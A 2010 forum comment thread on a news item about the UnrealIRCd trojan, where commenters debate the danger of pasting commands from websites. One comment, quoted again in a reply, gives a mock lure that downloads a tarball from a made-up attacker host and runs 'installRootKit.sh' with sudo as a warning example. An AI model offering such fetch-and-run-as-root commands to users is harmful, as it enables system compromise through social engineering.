Linked by Jordan Spencer Cunningham on Mon 14th Jun 2010 23:58 UTC
Bugs & Viruses
Recently, the Linux version of UnrealIRCd was discovered to have had a Trojan worm its way into the source code. Even more embarrassing for the developers of Unreal is that the Trojan's been holding open the backdoor in the source code since November of 2009-- not very recently. And, of course, bloggers and press in general are taking the opportunity of another breach in Linux security to point out doomsday devices that don't really exist.
Thread beginning with comment 430078
RE[5]: Comment by lemur2
by stew on Tue 15th Jun 2010 09:33 UTC in reply to "RE[4]: Comment by lemur2"
stew Member since: 2005-07-06

Are you seriously suggesting that copy&pasting commands that one doesn't understand from some web site is a safe thing to do? If you're training users to just blindly type 'sudo' commands without understanding what they do, you're creating a large opportunity for social engineering:

To get the latest Firefox with instant Facebook updates, type these commands:
1. wget http://thehax0rzplaze.com/infectedFireFox.tgz
2. tar zxvf infectedFireFox.tgz
3. sudo infectedFireFox/installRootKit.sh
then type your password.

Edited 2010-06-15 09:35 UTC

Reply Parent Score: 9

RE[6]: Comment by lemur2
by lemur2 on Tue 15th Jun 2010 09:58 in reply to "RE[5]: Comment by lemur2"
lemur2 Member since:
2007-02-17

Are you seriously suggesting that copy&pasting commands that one doesn't understand from some web site is a safe thing to do? If you're training users to just blindly type 'sudo' commands without understanding what they do, you're creating a large opportunity for social engineering:

To get the latest Firefox with instant Facebook updates, type these commands:
1. wget http://thehax0rzplaze.com/infectedFireFox.tgz
2. tar zxvf infectedFireFox.tgz
3. sudo infectedFireFox/installRootKit.sh
then type your password.


Strangely enough, what you just described is the very means by which one had to install the UnrealIRCd trojan.

You do have a point. I would first caution users to look for the keyword "signed" and "open source" on the source page.

Like this one has:
https://launchpad.net/~ubuntu-mozilla-daily/+archive/ppa

It says: "daily (or even multiple builds per day) for various mozilla projects and branches". Mozilla is open source.

It also says: "You can update your system with unsupported packages from this untrusted PPA by adding ppa:ubuntu-mozilla-daily/ppa to your system's Software Sources" so it warns you about what you are doing. There is no attempt at trickery of social engineering here; this is definitely a potential system-breaker thing to do.

The thing is, you can do it. You can participate in the cutting-edge development of Mozilla, via running, testing and reporting on the very latest build. Don't do this on anything other than a test system, however ... because, as it warns you, this is untrusted. Don't trust it on a system with anything important on it.

This is most decidedly a "user beware" operation. We are talking here about unstable nightly development builds, after all.

Edited 2010-06-15 10:03 UTC

Reply Parent Score: 2

jabbotts Member since:
2007-09-06

"Firefox can't find the server at www.thehax0rzplaze.com"


No Fair! It won't let me in!

(I kid, of course, though I would have laughed pretty hard if the domain did exist)

Reply Parent Score: 2